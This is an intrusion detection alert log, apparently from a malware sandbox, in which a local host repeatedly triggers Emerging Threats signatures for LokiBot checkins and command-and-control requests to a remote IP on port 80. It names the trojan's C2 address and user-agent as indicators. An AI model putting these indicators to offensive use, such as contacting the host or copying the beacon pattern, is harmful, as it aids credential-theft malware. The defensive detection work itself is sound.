                                              11/25/21-10:51:48.126751TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027280192.168.11.20176.223.209.128
                                              11/25/21-10:51:48.626427TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027380192.168.11.20176.223.209.128
                                              11/25/21-10:51:48.626427TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027380192.168.11.20176.223.209.128
                                              11/25/21-10:51:48.626427TCP2025381ET TROJAN LokiBot Checkin5027380192.168.11.20176.223.209.128
                                              11/25/21-10:51:48.626427TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027380192.168.11.20176.223.209.128
                                              11/25/21-10:51:49.081962TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027480192.168.11.20176.223.209.128
                                              11/25/21-10:51:49.081962TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027480192.168.11.20176.223.209.128
                                              11/25/21-10:51:49.081962TCP2025381ET TROJAN LokiBot Checkin5027480192.168.11.20176.223.209.128
                                              11/25/21-10:51:49.081962TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027480192.168.11.20176.223.209.128
                                              11/25/21-10:51:49.567233TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027580192.168.11.20176.223.209.128
                                              11/25/21-10:51:49.567233TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027580192.168.11.20176.223.209.128
                                              11/25/21-10:51:49.567233TCP2025381ET TROJAN LokiBot Checkin5027580192.168.11.20176.223.209.128
                                              11/25/21-10:51:49.567233TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027580192.168.11.20176.223.209.128
                                              11/25/21-10:51:50.073434TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027680192.168.11.20176.223.209.128
                                              11/25/21-10:51:50.073434TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027680192.168.11.20176.223.209.128
                                              11/25/21-10:51:50.073434TCP2025381ET TROJAN LokiBot Checkin5027680192.168.11.20176.223.209.128
                                              11/25/21-10:51:50.073434TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027680192.168.11.20176.223.209.128
                                              11/25/21-10:51:50.587694TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027780192.168.11.20176.223.209.128
                                              11/25/21-10:51:50.587694TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027780192.168.11.20176.223.209.128
                                              11/25/21-10:51:50.587694TCP2025381ET TROJAN LokiBot Checkin5027780192.168.11.20176.223.209.128
                                              11/25/21-10:51:50.587694TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027780192.168.11.20176.223.209.128
                                              11/25/21-10:51:51.089071TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027880192.168.11.20176.223.209.128
                                              11/25/21-10:51:51.089071TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027880192.168.11.20176.223.209.128
                                              11/25/21-10:51:51.089071TCP2025381ET TROJAN LokiBot Checkin5027880192.168.11.20176.223.209.128
                                              11/25/21-10:51:51.089071TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027880192.168.11.20176.223.209.128
                                              11/25/21-10:51:51.558423TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027980192.168.11.20176.223.209.128
                                              11/25/21-10:51:51.558423TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027980192.168.11.20176.223.209.128
                                              11/25/21-10:51:51.558423TCP2025381ET TROJAN LokiBot Checkin5027980192.168.11.20176.223.209.128
                                              11/25/21-10:51:51.558423TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027980192.168.11.20176.223.209.128
                                              11/25/21-10:51:52.059238TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028080192.168.11.20176.223.209.128
                                              11/25/21-10:51:52.059238TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028080192.168.11.20176.223.209.128
                                              11/25/21-10:51:52.059238TCP2025381ET TROJAN LokiBot Checkin5028080192.168.11.20176.223.209.128
                                              11/25/21-10:51:52.059238TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028080192.168.11.20176.223.209.128
                                              11/25/21-10:51:52.528089TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028180192.168.11.20176.223.209.128
                                              11/25/21-10:51:52.528089TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028180192.168.11.20176.223.209.128
                                              11/25/21-10:51:52.528089TCP2025381ET TROJAN LokiBot Checkin5028180192.168.11.20176.223.209.128
                                              11/25/21-10:51:52.528089TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028180192.168.11.20176.223.209.128
                                              11/25/21-10:51:53.007933TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028280192.168.11.20176.223.209.128
                                              11/25/21-10:51:53.007933TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028280192.168.11.20176.223.209.128
                                              11/25/21-10:51:53.007933TCP2025381ET TROJAN LokiBot Checkin5028280192.168.11.20176.223.209.128
                                              11/25/21-10:51:53.007933TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028280192.168.11.20176.223.209.128
                                              11/25/21-10:51:53.539837TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028380192.168.11.20176.223.209.128
                                              11/25/21-10:51:53.539837TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028380192.168.11.20176.223.209.128
                                              11/25/21-10:51:53.539837TCP2025381ET TROJAN LokiBot Checkin5028380192.168.11.20176.223.209.128
                                              11/25/21-10:51:53.539837TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028380192.168.11.20176.223.209.128
                                              11/25/21-10:51:54.048854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028480192.168.11.20176.223.209.128
                                              11/25/21-10:51:54.048854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028480192.168.11.20176.223.209.128
                                              11/25/21-10:51:54.048854TCP2025381ET TROJAN LokiBot Checkin5028480192.168.11.20176.223.209.128
                                              11/25/21-10:51:54.048854TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028480192.168.11.20176.223.209.128
                                              11/25/21-10:51:54.571504TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028580192.168.11.20176.223.209.128
                                              11/25/21-10:51:54.571504TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028580192.168.11.20176.223.209.128
                                              11/25/21-10:51:54.571504TCP2025381ET TROJAN LokiBot Checkin5028580192.168.11.20176.223.209.128
                                              11/25/21-10:51:54.571504TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028580192.168.11.20176.223.209.128
                                              11/25/21-10:51:55.074582TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028680192.168.11.20176.223.209.128
                                              11/25/21-10:51:55.074582TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028680192.168.11.20176.223.209.128
                                              11/25/21-10:51:55.074582TCP2025381ET TROJAN LokiBot Checkin5028680192.168.11.20176.223.209.128
                                              11/25/21-10:51:55.074582TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028680192.168.11.20176.223.209.128
                                              11/25/21-10:51:55.507302TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028780192.168.11.20176.223.209.128
                                              11/25/21-10:51:55.507302TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028780192.168.11.20176.223.209.128
                                              11/25/21-10:51:55.507302TCP2025381ET TROJAN LokiBot Checkin5028780192.168.11.20176.223.209.128
                                              11/25/21-10:51:55.507302TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028780192.168.11.20176.223.209.128
                                              11/25/21-10:51:56.038112TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028880192.168.11.20176.223.209.128
                                              11/25/21-10:51:56.038112TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028880192.168.11.20176.223.209.128
                                              11/25/21-10:51:56.038112TCP2025381ET TROJAN LokiBot Checkin5028880192.168.11.20176.223.209.128
                                              11/25/21-10:51:56.038112TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028880192.168.11.20176.223.209.128
                                              11/25/21-10:51:56.542012TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028980192.168.11.20176.223.209.128
                                              11/25/21-10:51:56.542012TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028980192.168.11.20176.223.209.128
                                              11/25/21-10:51:56.542012TCP2025381ET TROJAN LokiBot Checkin5028980192.168.11.20176.223.209.128
                                              11/25/21-10:51:56.542012TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028980192.168.11.20176.223.209.128
                                              11/25/21-10:51:57.052498TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029080192.168.11.20176.223.209.128
                                              11/25/21-10:51:57.052498TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029080192.168.11.20176.223.209.128
                                              11/25/21-10:51:57.052498TCP2025381ET TROJAN LokiBot Checkin5029080192.168.11.20176.223.209.128
                                              11/25/21-10:51:57.052498TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029080192.168.11.20176.223.209.128
                                              11/25/21-10:51:57.572349TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029180192.168.11.20176.223.209.128
                                              11/25/21-10:51:57.572349TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029180192.168.11.20176.223.209.128
                                              11/25/21-10:51:57.572349TCP2025381ET TROJAN LokiBot Checkin5029180192.168.11.20176.223.209.128
                                              11/25/21-10:51:57.572349TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029180192.168.11.20176.223.209.128
                                              11/25/21-10:51:58.081695TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029280192.168.11.20176.223.209.128
                                              11/25/21-10:51:58.081695TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029280192.168.11.20176.223.209.128
                                              11/25/21-10:51:58.081695TCP2025381ET TROJAN LokiBot Checkin5029280192.168.11.20176.223.209.128
                                              11/25/21-10:51:58.081695TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029280192.168.11.20176.223.209.128
                                              11/25/21-10:51:58.603737TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029380192.168.11.20176.223.209.128
                                              11/25/21-10:51:58.603737TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029380192.168.11.20176.223.209.128
                                              11/25/21-10:51:58.603737TCP2025381ET TROJAN LokiBot Checkin5029380192.168.11.20176.223.209.128
                                              11/25/21-10:51:58.603737TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029380192.168.11.20176.223.209.128
                                              11/25/21-10:51:59.123735TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029480192.168.11.20176.223.209.128
                                              11/25/21-10:51:59.123735TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029480192.168.11.20176.223.209.128
                                              11/25/21-10:51:59.123735TCP2025381ET TROJAN LokiBot Checkin5029480192.168.11.20176.223.209.128
                                              11/25/21-10:51:59.123735TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029480192.168.11.20176.223.209.128
                                              11/25/21-10:51:59.583120TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029580192.168.11.20176.223.209.128
                                              11/25/21-10:51:59.583120TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029580192.168.11.20176.223.209.128
                                              11/25/21-10:51:59.583120TCP2025381ET TROJAN LokiBot Checkin5029580192.168.11.20176.223.209.128
                                              11/25/21-10:51:59.583120TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029580192.168.11.20176.223.209.128
                                              11/25/21-10:52:00.084926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029680192.168.11.20176.223.209.128
                                              11/25/21-10:52:00.084926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029680192.168.11.20176.223.209.128
                                              11/25/21-10:52:00.084926TCP2025381ET TROJAN LokiBot Checkin5029680192.168.11.20176.223.209.128
                                              11/25/21-10:52:00.084926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029680192.168.11.20176.223.209.128
                                              11/25/21-10:52:00.618989TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029780192.168.11.20176.223.209.128
                                              11/25/21-10:52:00.618989TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029780192.168.11.20176.223.209.128
                                              11/25/21-10:52:00.618989TCP2025381ET TROJAN LokiBot Checkin5029780192.168.11.20176.223.209.128
                                              11/25/21-10:52:00.618989TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029780192.168.11.20176.223.209.128
                                              11/25/21-10:52:01.143885TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029880192.168.11.20176.223.209.128
                                              11/25/21-10:52:01.143885TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029880192.168.11.20176.223.209.128
                                              11/25/21-10:52:01.143885TCP2025381ET TROJAN LokiBot Checkin5029880192.168.11.20176.223.209.128
                                              11/25/21-10:52:01.143885TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029880192.168.11.20176.223.209.128
                                              11/25/21-10:52:01.658061TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029980192.168.11.20176.223.209.128
                                              11/25/21-10:52:01.658061TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029980192.168.11.20176.223.209.128
                                              11/25/21-10:52:01.658061TCP2025381ET TROJAN LokiBot Checkin5029980192.168.11.20176.223.209.128
                                              11/25/21-10:52:01.658061TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029980192.168.11.20176.223.209.128
                                              11/25/21-10:52:02.188969TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030080192.168.11.20176.223.209.128
                                              11/25/21-10:52:02.188969TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030080192.168.11.20176.223.209.128
                                              11/25/21-10:52:02.188969TCP2025381ET TROJAN LokiBot Checkin5030080192.168.11.20176.223.209.128
                                              11/25/21-10:52:02.188969TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030080192.168.11.20176.223.209.128
                                              11/25/21-10:52:02.707521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030180192.168.11.20176.223.209.128
                                              11/25/21-10:52:02.707521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030180192.168.11.20176.223.209.128
                                              11/25/21-10:52:02.707521TCP2025381ET TROJAN LokiBot Checkin5030180192.168.11.20176.223.209.128
                                              11/25/21-10:52:02.707521TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030180192.168.11.20176.223.209.128
                                              11/25/21-10:52:03.225980TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030280192.168.11.20176.223.209.128
                                              11/25/21-10:52:03.225980TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030280192.168.11.20176.223.209.128
                                              11/25/21-10:52:03.225980TCP2025381ET TROJAN LokiBot Checkin5030280192.168.11.20176.223.209.128
                                              11/25/21-10:52:03.225980TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030280192.168.11.20176.223.209.128
                                              11/25/21-10:52:03.735458TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030380192.168.11.20176.223.209.128
                                              11/25/21-10:52:03.735458TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030380192.168.11.20176.223.209.128
                                              11/25/21-10:52:03.735458TCP2025381ET TROJAN LokiBot Checkin5030380192.168.11.20176.223.209.128
                                              11/25/21-10:52:03.735458TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030380192.168.11.20176.223.209.128
                                              11/25/21-10:52:04.214606TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030480192.168.11.20176.223.209.128
                                              11/25/21-10:52:04.214606TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030480192.168.11.20176.223.209.128
                                              11/25/21-10:52:04.214606TCP2025381ET TROJAN LokiBot Checkin5030480192.168.11.20176.223.209.128
                                              11/25/21-10:52:04.214606TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030480192.168.11.20176.223.209.128
                                              11/25/21-10:52:04.684538TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030580192.168.11.20176.223.209.128
                                              11/25/21-10:52:04.684538TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030580192.168.11.20176.223.209.128
                                              11/25/21-10:52:04.684538TCP2025381ET TROJAN LokiBot Checkin5030580192.168.11.20176.223.209.128
                                              11/25/21-10:52:04.684538TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030580192.168.11.20176.223.209.128
                                              11/25/21-10:52:05.176481TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030680192.168.11.20176.223.209.128
                                              11/25/21-10:52:05.176481TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030680192.168.11.20176.223.209.128
                                              11/25/21-10:52:05.176481TCP2025381ET TROJAN LokiBot Checkin5030680192.168.11.20176.223.209.128
                                              11/25/21-10:52:05.176481TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030680192.168.11.20176.223.209.128
                                              11/25/21-10:52:05.687914TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030780192.168.11.20176.223.209.128
                                              11/25/21-10:52:05.687914TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030780192.168.11.20176.223.209.128
                                              11/25/21-10:52:05.687914TCP2025381ET TROJAN LokiBot Checkin5030780192.168.11.20176.223.209.128
                                              11/25/21-10:52:05.687914TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030780192.168.11.20176.223.209.128
                                              11/25/21-10:52:06.226743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030880192.168.11.20176.223.209.128
                                              11/25/21-10:52:06.226743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030880192.168.11.20176.223.209.128
                                              11/25/21-10:52:06.226743TCP2025381ET TROJAN LokiBot Checkin5030880192.168.11.20176.223.209.128
                                              11/25/21-10:52:06.226743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030880192.168.11.20176.223.209.128
                                              11/25/21-10:52:06.742992TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030980192.168.11.20176.223.209.128
                                              11/25/21-10:52:06.742992TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030980192.168.11.20176.223.209.128
                                              11/25/21-10:52:06.742992TCP2025381ET TROJAN LokiBot Checkin5030980192.168.11.20176.223.209.128
                                              11/25/21-10:52:06.742992TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030980192.168.11.20176.223.209.128
                                              11/25/21-10:52:07.216253TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031080192.168.11.20176.223.209.128
                                              11/25/21-10:52:07.216253TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031080192.168.11.20176.223.209.128
                                              11/25/21-10:52:07.216253TCP2025381ET TROJAN LokiBot Checkin5031080192.168.11.20176.223.209.128
                                              11/25/21-10:52:07.216253TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031080192.168.11.20176.223.209.128
                                              11/25/21-10:52:07.736750TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031180192.168.11.20176.223.209.128
                                              11/25/21-10:52:07.736750TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031180192.168.11.20176.223.209.128
                                              11/25/21-10:52:07.736750TCP2025381ET TROJAN LokiBot Checkin5031180192.168.11.20176.223.209.128
                                              11/25/21-10:52:07.736750TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031180192.168.11.20176.223.209.128
                                              11/25/21-10:52:08.228884TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031280192.168.11.20176.223.209.128
                                              11/25/21-10:52:08.228884TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031280192.168.11.20176.223.209.128
                                              11/25/21-10:52:08.228884TCP2025381ET TROJAN LokiBot Checkin5031280192.168.11.20176.223.209.128
                                              11/25/21-10:52:08.228884TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031280192.168.11.20176.223.209.128
                                              11/25/21-10:52:08.719767TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031380192.168.11.20176.223.209.128
                                              11/25/21-10:52:08.719767TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031380192.168.11.20176.223.209.128
                                              11/25/21-10:52:08.719767TCP2025381ET TROJAN LokiBot Checkin5031380192.168.11.20176.223.209.128
                                              11/25/21-10:52:08.719767TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031380192.168.11.20176.223.209.128
                                              11/25/21-10:52:09.223409TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031480192.168.11.20176.223.209.128
                                              11/25/21-10:52:09.223409TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031480192.168.11.20176.223.209.128
                                              11/25/21-10:52:09.223409TCP2025381ET TROJAN LokiBot Checkin5031480192.168.11.20176.223.209.128
                                              11/25/21-10:52:09.223409TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031480192.168.11.20176.223.209.128
                                              11/25/21-10:52:09.728246TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031580192.168.11.20176.223.209.128
                                              11/25/21-10:52:09.728246TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031580192.168.11.20176.223.209.128
                                              11/25/21-10:52:09.728246TCP2025381ET TROJAN LokiBot Checkin5031580192.168.11.20176.223.209.128
                                              11/25/21-10:52:09.728246TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031580192.168.11.20176.223.209.128
                                              11/25/21-10:52:10.154549TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031680192.168.11.20176.223.209.128
                                              11/25/21-10:52:10.154549TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031680192.168.11.20176.223.209.128
                                              11/25/21-10:52:10.154549TCP2025381ET TROJAN LokiBot Checkin5031680192.168.11.20176.223.209.128
                                              11/25/21-10:52:10.154549TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031680192.168.11.20176.223.209.128
                                              11/25/21-10:52:10.673271TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031780192.168.11.20176.223.209.128
                                              11/25/21-10:52:10.673271TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031780192.168.11.20176.223.209.128
                                              11/25/21-10:52:10.673271TCP2025381ET TROJAN LokiBot Checkin5031780192.168.11.20176.223.209.128
                                              11/25/21-10:52:10.673271TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031780192.168.11.20176.223.209.128
                                              11/25/21-10:52:11.194120TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031880192.168.11.20176.223.209.128
                                              11/25/21-10:52:11.194120TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031880192.168.11.20176.223.209.128
                                              11/25/21-10:52:11.194120TCP2025381ET TROJAN LokiBot Checkin5031880192.168.11.20176.223.209.128
                                              11/25/21-10:52:11.194120TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031880192.168.11.20176.223.209.128
                                              11/25/21-10:52:11.717969TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031980192.168.11.20176.223.209.128
                                              11/25/21-10:52:11.717969TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031980192.168.11.20176.223.209.128
                                              11/25/21-10:52:11.717969TCP2025381ET TROJAN LokiBot Checkin5031980192.168.11.20176.223.209.128
                                              11/25/21-10:52:11.717969TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031980192.168.11.20176.223.209.128
                                              11/25/21-10:52:12.234683TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032080192.168.11.20176.223.209.128
                                              11/25/21-10:52:12.234683TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032080192.168.11.20176.223.209.128
                                              11/25/21-10:52:12.234683TCP2025381ET TROJAN LokiBot Checkin5032080192.168.11.20176.223.209.128
                                              11/25/21-10:52:12.234683TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032080192.168.11.20176.223.209.128
                                              11/25/21-10:52:12.694839TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032180192.168.11.20176.223.209.128
                                              11/25/21-10:52:12.694839TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032180192.168.11.20176.223.209.128
                                              11/25/21-10:52:12.694839TCP2025381ET TROJAN LokiBot Checkin5032180192.168.11.20176.223.209.128
                                              11/25/21-10:52:12.694839TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032180192.168.11.20176.223.209.128
                                              11/25/21-10:52:13.182188TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032280192.168.11.20176.223.209.128
                                              11/25/21-10:52:13.182188TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032280192.168.11.20176.223.209.128
                                              11/25/21-10:52:13.182188TCP2025381ET TROJAN LokiBot Checkin5032280192.168.11.20176.223.209.128
                                              11/25/21-10:52:13.182188TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032280192.168.11.20176.223.209.128
                                              11/25/21-10:52:13.677236TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032380192.168.11.20176.223.209.128
                                              11/25/21-10:52:13.677236TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032380192.168.11.20176.223.209.128
                                              11/25/21-10:52:13.677236TCP2025381ET TROJAN LokiBot Checkin5032380192.168.11.20176.223.209.128
                                              11/25/21-10:52:13.677236TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032380192.168.11.20176.223.209.128
                                              11/25/21-10:52:14.189707TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032480192.168.11.20176.223.209.128
                                              11/25/21-10:52:14.189707TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032480192.168.11.20176.223.209.128
                                              11/25/21-10:52:14.189707TCP2025381ET TROJAN LokiBot Checkin5032480192.168.11.20176.223.209.128
                                              11/25/21-10:52:14.189707TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032480192.168.11.20176.223.209.128
                                              11/25/21-10:52:14.713650TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032580192.168.11.20176.223.209.128
                                              11/25/21-10:52:14.713650TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032580192.168.11.20176.223.209.128
                                              11/25/21-10:52:14.713650TCP2025381ET TROJAN LokiBot Checkin5032580192.168.11.20176.223.209.128
                                              11/25/21-10:52:14.713650TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032580192.168.11.20176.223.209.128
                                              11/25/21-10:52:15.234438TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032680192.168.11.20176.223.209.128
                                              11/25/21-10:52:15.234438TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032680192.168.11.20176.223.209.128
                                              11/25/21-10:52:15.234438TCP2025381ET TROJAN LokiBot Checkin5032680192.168.11.20176.223.209.128
                                              11/25/21-10:52:15.234438TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032680192.168.11.20176.223.209.128
                                              11/25/21-10:52:15.707321TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032780192.168.11.20176.223.209.128
                                              11/25/21-10:52:15.707321TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032780192.168.11.20176.223.209.128
                                              11/25/21-10:52:15.707321TCP2025381ET TROJAN LokiBot Checkin5032780192.168.11.20176.223.209.128
                                              11/25/21-10:52:15.707321TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032780192.168.11.20176.223.209.128
                                              11/25/21-10:52:16.204603TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032880192.168.11.20176.223.209.128
                                              11/25/21-10:52:16.204603TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032880192.168.11.20176.223.209.128
                                              11/25/21-10:52:16.204603TCP2025381ET TROJAN LokiBot Checkin5032880192.168.11.20176.223.209.128
                                              11/25/21-10:52:16.204603TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032880192.168.11.20176.223.209.128
                                              11/25/21-10:52:16.719602TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032980192.168.11.20176.223.209.128
                                              11/25/21-10:52:16.719602TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032980192.168.11.20176.223.209.128
                                              11/25/21-10:52:16.719602TCP2025381ET TROJAN LokiBot Checkin5032980192.168.11.20176.223.209.128
                                              11/25/21-10:52:16.719602TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032980192.168.11.20176.223.209.128
                                              11/25/21-10:52:17.227829TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033080192.168.11.20176.223.209.128
                                              11/25/21-10:52:17.227829TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033080192.168.11.20176.223.209.128
                                              11/25/21-10:52:17.227829TCP2025381ET TROJAN LokiBot Checkin5033080192.168.11.20176.223.209.128
                                              11/25/21-10:52:17.227829TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033080192.168.11.20176.223.209.128
